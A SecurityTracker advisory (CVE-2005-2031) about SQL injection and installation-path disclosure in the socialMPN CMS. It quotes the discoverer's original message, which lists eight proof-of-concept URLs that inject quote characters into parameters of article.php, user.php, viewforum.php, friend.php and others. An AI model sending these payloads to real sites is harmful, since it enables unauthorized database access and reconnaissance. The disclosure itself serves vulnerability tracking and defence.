SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   socialMPN Vendors:   socialmpn.com
socialMPN Input Validation Holes Permit SQL Injection Attacks
SecurityTracker Alert ID:  1014214
SecurityTracker URL:  http://securitytracker.com/id/1014214
CVE Reference:   CVE-2005-2031   (Links to External Site)
Updated:  Jul 17 2008
Original Entry Date:  Jun 16 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   LINUX from sosvulnerable.net reported several vulnerabilities in socialMPN. A remote user can inject SQL commands. A remote user can also determine the installation path.

The software does not properly validate user-supplied input in several variables. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/article.php?sid=%27

http://[target]/user.php?uname='&pass=1&op=login

http://[target]/viewforum.php?forum=43&siteid=%2527

http://[target]/newtopic.php?username='&password=

http://[target]/sections.php?op=listarticles&secid=%27

http://[target]/sections.php?op=listarticles&artid=%2527

http://[target]/index.php?siteid='&op=show&aftersid=380

http://[target]/friend.php?sid=%2527&yname=1&ymail=1&fname=1&fmail=1&op=SendStory

Some of these exploit examples may also cause the system to disclose the installation path.

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.socialmpn.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Social MPN sql injection and full path disclosure


/*
--------------------------------------------------------
-- www.sosvulnerable.net  Security  --
--------------------------------------------------------
Program:  Social MPN
Homepage:  http://www.socialmpn.com
Vulnerable Versions: all
Risk: high
Impact: sql injection and full path disclosure, attacker may execute
arbitrary SQL statements on the vulnerable system.
This may compromise the integrity of your database and expose
sensitive information.

                     -== ==-
--------------------------------------------------------------------------------------------

- Description

Social MPN is one CMS myPHPNuke like.  SocialMPN The biggest change to
the system is the multi-site functionality we have incorporated into
the package. This allows you to run multiple websites from one install
of SocialMPN.
This can range to completely separate domains (ie: Ruffdogs.com,
vsadesign.com),
to an all inclusive site with user owned sections, or based on
sub-domains, guilinux.com,
mandrake.guilinux.com, fedora.guilinux.com, (wild cards must be
enabled on the server for
this).
--------------------------------------------------------------------------------------------

POC:

Tested with these query variables  

http://xxx.xxx.xxx.xxx/article.php?sid=%27

http://xxx.xxx.xxx.xxx/user.php?uname='&pass=1&op=login

http://xxx.xxx.xxx.xxx/viewforum.php?forum=43&siteid=%2527

http://xxx.xxx.xxx.xxx/newtopic.php?username='&password=

http://xxx.xxx.xxx.xxx/sections.php?op=listarticles&secid=%27

http://xxx.xxx.xxx.xxx/sections.php?op=listarticles&artid=%2527

http://xxx.xxx.xxx.xxx/index.php?siteid='&op=show&aftersid=380

http://xxx.xxx.xxx.xxx/friend.php?sid=%2527&yname=1&ymail=1&fname=1&fmail=1&op=SendStory

--------------------------------------------------------------------------------------------



- Credits
-------------------------------------------------
Discovered by LINUX <admin@sosvulnerable.net> http://www.sosvulnerable.net/



Irc.gigachat.net #shell #uruguay 

- Greets
--------------------------------------------------------
           
HaCkZataN, Ali, Waraxe (all waraxe forum members), Slimjim100,erg0t, b04 ,
beford, Mafia Boy (all Gigachat Irc people), .ru crew friends
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC